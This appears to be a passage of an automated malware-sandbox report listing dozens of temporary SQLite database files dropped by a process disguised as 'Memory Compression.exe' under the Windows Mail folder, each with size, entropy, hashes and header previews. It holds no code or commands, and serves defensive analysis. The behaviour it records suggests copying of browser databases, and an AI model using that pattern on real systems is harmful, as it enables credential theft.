                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\5xKBRubVeE

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):196608
                                                                                                                                Entropy (8bit):1.121297215059106
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\62qTpQ4qhT

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.6732424250451717
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\6OqVKuQ8yy

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):106496
                                                                                                                                Entropy (8bit):1.136413900497188
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\6Oy1ZMxU2U

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.5712781801655107
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\6cKWaK0Cja

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):196608
                                                                                                                                Entropy (8bit):1.121297215059106
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\6j7muolslY

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):51200
                                                                                                                                Entropy (8bit):0.8746135976761988
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\6jvZHMbNnw

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.6732424250451717
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\78ZOaRxQWi

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):40960
                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\7ILfmybrjj

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):40960
                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\7JlImy7ULY

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):196608
                                                                                                                                Entropy (8bit):1.121297215059106
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\7SE6ZoavEp

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):196608
                                                                                                                                Entropy (8bit):1.121297215059106
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\7SM1lgumM5

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.5712781801655107
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\81hkuknOAn

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\8ZCqejeR70

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):51200
                                                                                                                                Entropy (8bit):0.8746135976761988
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\8fU6RQ9wNP

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\8wrDR6ItWp

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):51200
                                                                                                                                Entropy (8bit):0.8746135976761988
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\9NTYS45YUe

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\9OVPxEPhEo

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.8439810553697228
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                                                                                MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                                                                                SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                                                                                SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                                                                                SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\9QaTWUWjOE

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\9cA4OoO0an

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.5712781801655107
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\9nX5NANSjB

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.6732424250451717
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\AAk2yKF5C1

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):196608
                                                                                                                                Entropy (8bit):1.121297215059106
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\AAxoitUyDc

                                                                                                                                Download File
